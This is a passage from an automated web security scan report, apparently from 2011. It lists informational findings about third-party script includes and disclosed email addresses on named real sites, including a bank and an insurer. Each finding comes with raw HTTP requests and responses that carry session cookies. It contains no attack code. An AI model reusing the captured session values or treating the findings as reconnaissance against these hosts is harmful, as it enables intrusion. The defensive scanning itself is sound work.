Cookie: __utmz=1.1305557438.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); PHPSESSID=shsfh547e8d0bgd8n3cvu8a1g6; __utma=1.327532980.1305557438.1305557438.1305557438.1; __utmc=1; __utmb=1.1.10.1305557438;

Response

HTTP/1.1 200 OK
Date: Mon, 16 May 2011 15:19:13 GMT
Server: Apache
X-Powered-By: PHP/5.3.3-7+squeeze1
Cache-Control: max-age=0
Expires: Mon, 16 May 2011 15:19:13 GMT
Vary: Accept-Encoding
Content-Type: text/html
Connection: close
Via: 1.1 AN-0016020122637050
Content-Length: 12289


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Content-
...[SNIP]...
</div>

<script src="http://www.google-analytics.com/urchin.js" type="text/javascript">
</script>
...[SNIP]...
13.44. https://www.paperg.com/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.paperg.com
Path:   /

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET / HTTP/1.1
Host: www.paperg.com
Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utma=27786045.1704528150.1305557138.1305557138.1305557138.1; __utmc=27786045; __utmz=27786045.1305557138.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); PHPSESSID=b7octmjd2jmcj47lrmihtort65; __utmb=27786045

Response

HTTP/1.1 200 OK
Date: Mon, 16 May 2011 14:46:28 GMT
Server: Apache
X-Powered-By: PHP/5.3.3-7+squeeze1
P3P: CP="CAO PSA OUR"
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Vary: Accept-Encoding
Connection: close
Content-Type: text/html
Content-Length: 2977


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Conte
...[SNIP]...
</script>
<script type="text/javascript" src="https://ajax.googleapis.com/ajax/libs/jquery/1.4.2/jquery.min.js"></script>
...[SNIP]...
</div>
   
   <script src="https://ssl.google-analytics.com/urchin.js" type="text/javascript">
</script>
...[SNIP]...
13.45. https://www.paperg.com/forgot.php  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.paperg.com
Path:   /forgot.php

Issue detail

The response dynamically includes the following script from another domain:

Request

GET /forgot.php HTTP/1.1
Host: www.paperg.com
Connection: keep-alive
Referer: http://www.paperg.com/publishers/flyerboard.php
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utma=27786045.1704528150.1305557138.1305557138.1305557138.1; __utmb=27786045; __utmc=27786045; __utmz=27786045.1305557138.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none)

Response

HTTP/1.1 200 OK
Date: Mon, 16 May 2011 14:45:47 GMT
Server: Apache
X-Powered-By: PHP/5.3.3-7+squeeze1
P3P: CP="CAO PSA OUR"
Set-Cookie: PHPSESSID=fq6c4o1f1f4ashphj9o9s9e8j3; path=/
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Vary: Accept-Encoding
Connection: close
Content-Type: text/html
Content-Length: 3158


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
   <meta http-equiv="Con
...[SNIP]...
</div>
       <script src="https://ssl.google-analytics.com/urchin.js" type="text/javascript">
   </script>
...[SNIP]...
13.46. https://www.paperg.com/post.php  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.paperg.com
Path:   /post.php

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /post.php HTTP/1.1
Host: www.paperg.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=27786045.1305558925.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); PHPSESSID=shsfh547e8d0bgd8n3cvu8a1g6; __utma=27786045.1907620487.1305558925.1305558925.1305561354.2; __utmc=27786045; __utmb=27786045;

Response

HTTP/1.0 200 OK
Date: Mon, 16 May 2011 16:45:38 GMT
Server: Apache
X-Powered-By: PHP/5.3.3-7+squeeze1
P3P: CP="CAO PSA OUR"
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Vary: Accept-Encoding
Connection: close
Content-Type: text/html


<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">
<html lang="en">
   <head>
       <title>PaperG | Post a Flyer</title>
       
       <meta http-equiv="Content-Type" co
...[SNIP]...
<link id="favicon" rel="icon" type="image/gif" href="icon.gif">
       
       
       <script type="text/javascript" src="https://ajax.googleapis.com/ajax/libs/jquery/1.4.2/jquery.min.js"></script>
...[SNIP]...
</div>
       <script src="https://ssl.google-analytics.com/urchin.js" type="text/javascript">
   </script>
...[SNIP]...
13.47. http://www.placelocal.com/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.placelocal.com
Path:   /

Issue detail

The response dynamically includes the following script from another domain:

Request

GET / HTTP/1.1
Host: www.placelocal.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:2.0.1) Gecko/20100101 Firefox/4.0.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip, deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.placelocal.com/forgot_password.php
Cookie: PHPSESSID=4d3oqoeopjg5os4f6kha7nto63; __utma=94208860.1014089333.1305558942.1305558942.1305562510.2; __utmc=94208860; __utmz=94208860.1305562510.2.2.utmcsr=paperg.com|utmccn=(referral)|utmcmd=referral|utmcct=/contact.php; __utmb=94208860.1.10.1305562510; olarkld=1305562510086; wcsid=82HE08PKOH0GNJJUGLKIDRZJ41167521; _oklv=1305562512332; hblid=2AUKUUQZQC24174KYBGUP1HK41167521

Response

HTTP/1.1 200 OK
Server: nginx/0.7.67
Date: Mon, 16 May 2011 16:15:21 GMT
Content-Type: text/html
Connection: keep-alive
X-Powered-By: PHP/5.3.2-1
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: success=deleted; expires=Sun, 16-May-2010 16:15:20 GMT
Set-Cookie: success_cookie_name=deleted; expires=Sun, 16-May-2010 16:15:20 GMT
Vary: Accept-Encoding
Content-Length: 13932

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Content-T
...[SNIP]...
</script>


<script src="http://www.google.com/jsapi?key=ABQIAAAAK4w3NFQ7jNc9H_aBi1SeIxTUI-1Ea8HwDxTAKXuX4kDK8DvVVxSzQunywvAxmW7Ss3dolGdlaBDimA" type="text/javascript"></script>
...[SNIP]...
13.48. http://www.xsnet.com/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.xsnet.com
Path:   /

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET / HTTP/1.1
Host: www.xsnet.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Length: 41050
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/6.0
P3P: policyref="http://www.hubspot.com/w3c/p3p.xml", CP="CURa ADMa DEVa TAIa PSAa PSDa OUR IND DSP NON COR"
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Set-Cookie: .ASPXANONYMOUS=aFDnln1KzAEkAAAAOTU2Y2ZhYjAtNjUwZS00Mjk0LTg2NGEtMzAyZjJkOWZjMGYx0; expires=Mon, 25-Jul-2011 03:47:35 GMT; path=/; HttpOnly
Date: Mon, 16 May 2011 17:07:35 GMT
Set-Cookie: HUBSPOT32=236000428.20480.0000; path=/

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">


<html>
<head id="Head">

<script type="text/javascript">
//<!
...[SNIP]...
<link id="PORTAL_CSS_64787" rel="stylesheet" type="text/css" media="screen" href="/Portals/64787/custom.css" />
<script src="http://cdn.jquerytools.org/1.2.2/full/jquery.tools.min.js" type="text/javascript"></script>
...[SNIP]...
<link rel="stylesheet" href="//static.hubspot.com/final/css/common/jquery/jquery.fancybox-1.3.1-adjusted.css" type="text/css" />
<script type="text/javascript" src="//static.hubspot.com/js/hui/core.js"></script>
...[SNIP]...
</script><script src="//translate.google.com/translate_a/element.js?cb=googleTranslateElementInit"></script>
...[SNIP]...
</div>
<script type="text/javascript" src="http://s7.addthis.com/js/250/addthis_widget.js#username=xa-4cd989666c0edf81"></script>
...[SNIP]...
</script>

<script type="text/javascript" src="//ajax.googleapis.com/ajax/libs/jquery/1.3.2/jquery.min.js"></script>
...[SNIP]...
</script>
<script type="text/javascript" src="//static.hubspot.com/final/js/common/jquery/plugins/jquery.fancybox-1.3.1.js"></script>
...[SNIP]...
13.49. http://www.xsnet.com/datacenter-relocation-services/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.xsnet.com
Path:   /datacenter-relocation-services/

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /datacenter-relocation-services/ HTTP/1.1
Host: www.xsnet.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:2.0.1) Gecko/20100101 Firefox/4.0.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip, deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.xsnet.com/it-asset-disposition-services/
Cookie: .ASPXANONYMOUS=XJ4onn1KzAEkAAAAMzIwYTQ3NDctN2Q1NC00YjBjLWEzNzctMjU4NmNhMmQ0MDM20; HUBSPOT32=236000428.20480.0000; hubspotutktzo=-5; __utma=15864383.1350355448.1305565681.1305565681.1305565681.1; __utmb=15864383.1.10.1305565681; __utmc=15864383; __utmz=15864383.1305565681.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); hubspotdt=2011-05-16%2013%3A07%3A56; hubspotutk=86af4891a61346df815605a4fd7b2019; hubspotvd=86af4891a61346df815605a4fd7b2019; hubspotvw=86af4891a61346df815605a4fd7b2019; hubspotvm=86af4891a61346df815605a4fd7b2019; hsfirstvisit=http%3A%2F%2Fwww.xsnet.com%2F||2011-05-16%2013%3A07%3A56; ASP.NET_SessionId=0g4s55ecqax4mc55jdooul55

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Length: 50438
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/6.0
P3P: policyref="http://www.hubspot.com/w3c/p3p.xml", CP="CURa ADMa DEVa TAIa PSAa PSDa OUR IND DSP NON COR"
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Date: Mon, 16 May 2011 17:08:24 GMT

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">


<html>
<head id="Head">

<script type="text/javascript">
//<!
...[SNIP]...
<link id="PORTAL_CSS_64787" rel="stylesheet" type="text/css" media="screen" href="/Portals/64787/custom.css" />
<script src="http://cdn.jquerytools.org/1.2.2/full/jquery.tools.min.js" type="text/javascript"></script>
...[SNIP]...
<link rel="stylesheet" href="//static.hubspot.com/final/css/common/jquery/jquery.fancybox-1.3.1-adjusted.css" type="text/css" />
<script type="text/javascript" src="//static.hubspot.com/js/hui/core.js"></script>
...[SNIP]...
</script><script src="//translate.google.com/translate_a/element.js?cb=googleTranslateElementInit"></script>
...[SNIP]...
</div>
<script type="text/javascript" src="http://s7.addthis.com/js/250/addthis_widget.js#username=xa-4cd989666c0edf81"></script>
...[SNIP]...
</script>

<script type="text/javascript" src="//ajax.googleapis.com/ajax/libs/jquery/1.3.2/jquery.min.js"></script>
...[SNIP]...
</script>
<script type="text/javascript" src="//static.hubspot.com/final/js/common/jquery/plugins/jquery.fancybox-1.3.1.js"></script>
...[SNIP]...
13.50. http://www.xsnet.com/it-asset-disposition-services/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.xsnet.com
Path:   /it-asset-disposition-services/

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /it-asset-disposition-services/ HTTP/1.1
Host: www.xsnet.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:2.0.1) Gecko/20100101 Firefox/4.0.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip, deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.xsnet.com/
Cookie: .ASPXANONYMOUS=XJ4onn1KzAEkAAAAMzIwYTQ3NDctN2Q1NC00YjBjLWEzNzctMjU4NmNhMmQ0MDM20; HUBSPOT32=236000428.20480.0000; hubspotutktzo=-5; __utma=15864383.1350355448.1305565681.1305565681.1305565681.1; __utmb=15864383.1.10.1305565681; __utmc=15864383; __utmz=15864383.1305565681.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); hubspotdt=2011-05-16%2013%3A07%3A56; hubspotutk=86af4891a61346df815605a4fd7b2019; hubspotvd=86af4891a61346df815605a4fd7b2019; hubspotvw=86af4891a61346df815605a4fd7b2019; hubspotvm=86af4891a61346df815605a4fd7b2019; hsfirstvisit=http%3A%2F%2Fwww.xsnet.com%2F||2011-05-16%2013%3A07%3A56

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Length: 50347
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/6.0
P3P: policyref="http://www.hubspot.com/w3c/p3p.xml", CP="CURa ADMa DEVa TAIa PSAa PSDa OUR IND DSP NON COR"
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Set-Cookie: ASP.NET_SessionId=1zi2sl55qbpilpqjcez3l0rk; path=/; HttpOnly
Date: Mon, 16 May 2011 17:08:16 GMT

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">


<html>
<head id="Head">

<script type="text/javascript">
//<!
...[SNIP]...
<link id="PORTAL_CSS_64787" rel="stylesheet" type="text/css" media="screen" href="/Portals/64787/custom.css" />
<script src="http://cdn.jquerytools.org/1.2.2/full/jquery.tools.min.js" type="text/javascript"></script>
...[SNIP]...
<link rel="stylesheet" href="//static.hubspot.com/final/css/common/jquery/jquery.fancybox-1.3.1-adjusted.css" type="text/css" />
<script type="text/javascript" src="//static.hubspot.com/js/hui/core.js"></script>
...[SNIP]...
</script><script src="//translate.google.com/translate_a/element.js?cb=googleTranslateElementInit"></script>
...[SNIP]...
</div>
<script type="text/javascript" src="http://s7.addthis.com/js/250/addthis_widget.js#username=xa-4cd989666c0edf81"></script>
...[SNIP]...
</script>

<script type="text/javascript" src="//ajax.googleapis.com/ajax/libs/jquery/1.3.2/jquery.min.js"></script>
...[SNIP]...
</script>
<script type="text/javascript" src="//static.hubspot.com/final/js/common/jquery/plugins/jquery.fancybox-1.3.1.js"></script>
...[SNIP]...
14. Email addresses disclosed  previous  next
There are 24 instances of this issue:

Issue background

The presence of email addresses within application responses does not necessarily constitute a security vulnerability. Email addresses may appear intentionally within contact information, and many applications (such as web mail) include arbitrary third-party email addresses within their core content.

However, email addresses of developers and other individuals (whether appearing on-screen or hidden within page source) may disclose information that is useful to an attacker; for example, they may represent usernames that can be used at the application's login, and they may be used in social engineering attacks against the organisation's personnel. Unnecessary or excessive disclosure of email addresses may also lead to an increase in the volume of spam email received.

Issue remediation

You should review the email addresses being disclosed by the application, and consider removing any that are unnecessary, or replacing personal addresses with anonymous mailbox addresses (such as helpdesk@example.com).

14.1. https://my.cigna.com/mycignatheme/js/min/js.js  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://my.cigna.com
Path:   /mycignatheme/js/min/js.js

Issue detail

The following email addresses were disclosed in the response:

Request

GET /mycignatheme/js/min/js.js HTTP/1.1
Host: my.cigna.com
Connection: keep-alive
Referer: https://my.cigna.com/web/public/guest
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utmz=252045595.1305559758.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=252045595.1041628650.1305559758.1305559758.1305559758.1; __utmc=252045595; __utmb=252045595.3.10.1305559758; PD_STATEFUL_eb751ba4-4b84-11e0-9e32-20548964aa77=%2Fweb%2Fpublic; TLTSID=6ABC569A7FD1107F0BC4BAE6BADFEE2C; TLTUID=6ABC569A7FD1107F0BC4BAE6BADFEE2C; MYCIGNA_OEP_JSESSIONID=0000j9-jFIsAOpI0nY2ozUvv8Ny:15ngp45tc; PD_STATEFUL_de5d83e8-4b84-11e0-9e32-20548964aa77=%2Fweb%2Fpublic; PD_STATEFUL_e87abf76-4b84-11e0-9e32-20548964aa77=%2Fmycignatheme

Response

HTTP/1.1 200 OK
content-language: en-US
content-type: application/x-javascript
date: Mon, 16 May 2011 15:12:06 GMT
last-modified: Tue, 26 Apr 2011 15:13:37 GMT
p3p: CP="NON CUR OTPi OUR NOR UNI"
server: IBM_HTTP_Server
age: 1102
Content-Length: 516206

//alert("popup invoked..." + top.window.document.getElementById("portalLogoutUrl").href);
var parentFlag="";
var rand_num = 'generator' + Math.random(); //generate a random window name.
var click =
...[SNIP]...
indicating if tablesorter should display debuging information usefull for development.
*
* @type jQuery
*
* @name tablesorter
*
* @cat Plugins/Tablesorter
*
* @author Christian Bach/christian.bach@polyester.se
*/

(function($) {
   $.extend({
       tablesorter: new function() {
           
           var parsers = [], widgets = [];
           
           this.defaults = {
               cssHeader: "header",
               cssAsc: "headerSortUp",
               css
...[SNIP]...
ument).ready(function(){
   expandCollapseOnReadyEvents();
});/**
* --------------------------------------------------------------------
* jQuery-Plugin "daterangepicker.jQuery.js"
* by Scott Jehl, scott@filamentgroup.com
* http://www.filamentgroup.com
* reference article: http://www.filamentgroup.com/lab/update_date_range_picker_with_jquery_ui/
* demo page: http://www.filamentgroup.com/examples/daterangepicker/
*
...[SNIP]...
14.2. https://my.cigna.com/mycignatheme/js/min/jsTop.js  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://my.cigna.com
Path:   /mycignatheme/js/min/jsTop.js

Issue detail

The following email address was disclosed in the response:

Request

GET /mycignatheme/js/min/jsTop.js HTTP/1.1
Host: my.cigna.com
Connection: keep-alive
Referer: https://my.cigna.com/web/public/guest
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utmz=252045595.1305559758.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=252045595.1041628650.1305559758.1305559758.1305559758.1; __utmc=252045595; __utmb=252045595.3.10.1305559758; TLTSID=68E806DE7FD1107F11DEAFC5F6A8CE37; TLTUID=68E806DE7FD1107F11DEAFC5F6A8CE37; MYCIGNA_OEP_JSESSIONID=0000gya5ooLNN8su43COFm2xuVB:15ngp3vj1; PD_STATEFUL_eb751ba4-4b84-11e0-9e32-20548964aa77=%2Fweb%2Fpublic

Response

HTTP/1.1 200 OK
content-language: en-US
content-type: application/x-javascript
date: Mon, 16 May 2011 15:30:26 GMT
last-modified: Wed, 20 Apr 2011 17:47:00 GMT
p3p: CP="NON CUR OTPi OUR NOR UNI"
server: IBM_HTTP_Server
Set-Cookie: PD_STATEFUL_e87abf76-4b84-11e0-9e32-20548964aa77=%2Fmycignatheme; Path=/
Content-Length: 168592

function progressbar(limit, met, gwidth) {    
calpercentage = Math.round(met*100/limit);
calwidth=Math.round(gwidth*(calpercentage/100));
remwidth=Math.round(gwidth-calwidth)
output='<div class="out
...[SNIP]...
ll be set and the cookie transmission will
* require a secure protocol (like HTTPS).
* @type undefined
*
* @name $.cookie
* @cat Plugins/Cookie
* @author Klaus Hartl/klaus.hartl@stilbuero.de
*/

/**
* Get the value of a cookie with the given name.
*
* @example $.cookie('the_cookie');
* @desc Get the value of a cookie.
*
* @param String name The name of the cookie.
* @return The value of the cookie.
* @type String
*
* @name $.cookie
* @cat Plugins/Cookie
* @author Klaus Hartl/klaus.hartl@stilbuero.de
*/
jQuery.cookie = function(name, value, options) {
if (typeof value != 'undefined') { // name and value given, set cookie
options = options || {};
if (value === null) {

...[SNIP]...
14.3. https://securebank.regions.com/ForgottenPassword.aspx  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://securebank.regions.com
Path:   /ForgottenPassword.aspx

Issue detail

The following email address was disclosed in the response:

Request

GET /ForgottenPassword.aspx HTTP/1.1
Host: securebank.regions.com
Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Set-Cookie: securebank.regions.com-https=R851515607; path=/
Cache-Control: no-cache, no-store
Date: Mon, 16 May 2011 15:20:17 GMT
Pragma: no-cache
Content-Type: text/html; charset=utf-8
Expires: -1
Server: Microsoft-IIS/6.0
PICS-Label: (PICS-1.0 "http://www.rsac.org/ratingsv01.html" l by "support@amsouth.com" on "2006.10.30T12:53-0600" exp "2020.10.30T12:00-0600" r (v 0 s 0 n 0 l 0))
X-Powered-By: ASP.NET
X-AspNet-Version: 1.1.4322
Set-Cookie: ASP.NET_SessionId=sg41ptigwefyqt55op0wstbb; path=/
Vary: Accept-Encoding
Content-Length: 15873


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<HTML>
<HEAD>
       <title>Regions Online Banking</title>
       <link href="styles/styles.
...[SNIP]...
14.4. https://securebank.regions.com/SystemUnavailable.aspx  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://securebank.regions.com
Path:   /SystemUnavailable.aspx

Issue detail

The following email address was disclosed in the response:

Request

GET /SystemUnavailable.aspx?ResultCode=VALIDATIONERROR HTTP/1.1
Host: securebank.regions.com
Connection: keep-alive
Referer: https://www.regions.com/personal_banking.rf
Cache-Control: max-age=0
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: securebank.regions.com-https=R890651000; ASP.NET_SessionId=rxyjhw55ndvthz45fybes045

Response

HTTP/1.1 200 OK
Set-Cookie: securebank.regions.com-https=R890651000; path=/
Cache-Control: no-cache, no-store
Date: Mon, 16 May 2011 15:20:16 GMT
Pragma: no-cache
Content-Type: text/html; charset=utf-8
Expires: -1
Server: Microsoft-IIS/6.0
PICS-Label: (PICS-1.0 "http://www.rsac.org/ratingsv01.html" l by "support@amsouth.com" on "2006.10.30T12:53-0600" exp "2020.10.30T12:00-0600" r (v 0 s 0 n 0 l 0))
X-Powered-By: ASP.NET
X-AspNet-Version: 1.1.4322
Vary: Accept-Encoding
Content-Length: 4559


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<HTML>
   <HEAD>
       <title>Regions Online Banking</title>
       <link href="https://secureb
...[SNIP]...
14.5. https://securebank.regions.com/VAM/2_0_2/VAM.js  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://securebank.regions.com
Path:   /VAM/2_0_2/VAM.js

Issue detail

The following email address was disclosed in the response:

Request

GET /VAM/2_0_2/VAM.js HTTP/1.1
Host: securebank.regions.com
Connection: keep-alive
Referer: https://securebank.regions.com/ForgottenPassword.aspx
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ASP.NET_SessionId=o04ii1rbvtg5cf551jfznb55; WT_FPC=id=24d8b1f5a6df3d9403b1305555424020:lv=1305555424020:ss=1305555424020; securebank.regions.com-https=R929786393

Response

HTTP/1.1 200 OK
Set-Cookie: securebank.regions.com-https=R929786393; path=/
Cache-Control: max-age=86400
Content-Type: application/x-javascript
Last-Modified: Fri, 15 Sep 2006 20:19:48 GMT
Accept-Ranges: bytes
ETag: "08a854a4d9c61:f627"
Vary: Accept-Encoding
Server: Microsoft-IIS/6.0
PICS-Label: (PICS-1.0 "http://www.rsac.org/ratingsv01.html" l by "support@amsouth.com" on "2006.10.30T12:53-0600" exp "2020.10.30T12:00-0600" r (v 0 s 0 n 0 l 0))
X-Powered-By: ASP.NET
Date: Mon, 16 May 2011 15:17:06 GMT
Content-Length: 37697

// Copyright 2003, 2004 Peter L. Blum, All Rights Reserved, www.PeterBlum.com
// Professional Validation And More v2.0.2 Level 2


var gVAM_UA = navigator.userAgent.toLowerCase();
var gVAM_OS, gV
...[SNIP]...
14.6. https://securebank.regions.com/VAM/2_0_2/VAML2.js  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://securebank.regions.com
Path:   /VAM/2_0_2/VAML2.js

Issue detail

The following email address was disclosed in the response:

Request

GET /VAM/2_0_2/VAML2.js HTTP/1.1
Host: securebank.regions.com
Connection: keep-alive
Referer: https://securebank.regions.com/ForgottenPassword.aspx
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ASP.NET_SessionId=o04ii1rbvtg5cf551jfznb55; WT_FPC=id=24d8b1f5a6df3d9403b1305555424020:lv=1305555424020:ss=1305555424020; securebank.regions.com-https=R929786393

Response

HTTP/1.1 200 OK
Set-Cookie: securebank.regions.com-https=R929786393; path=/
Cache-Control: max-age=86400
Content-Type: application/x-javascript
Last-Modified: Fri, 15 Sep 2006 20:19:48 GMT
Accept-Ranges: bytes
ETag: "08a854a4d9c61:f627"
Vary: Accept-Encoding
Server: Microsoft-IIS/6.0
PICS-Label: (PICS-1.0 "http://www.rsac.org/ratingsv01.html" l by "support@amsouth.com" on "2006.10.30T12:53-0600" exp "2020.10.30T12:00-0600" r (v 0 s 0 n 0 l 0))
X-Powered-By: ASP.NET
Date: Mon, 16 May 2011 15:17:06 GMT
Content-Length: 5007

// Copyright 2003, 2004 Peter L. Blum, All Rights Reserved, www.PeterBlum.com
// Professional Validation And More v2.0.2 Level 2


